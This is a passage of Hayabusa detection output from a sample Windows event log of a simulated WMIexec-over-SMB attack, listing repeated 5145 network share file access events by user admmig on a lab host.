Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 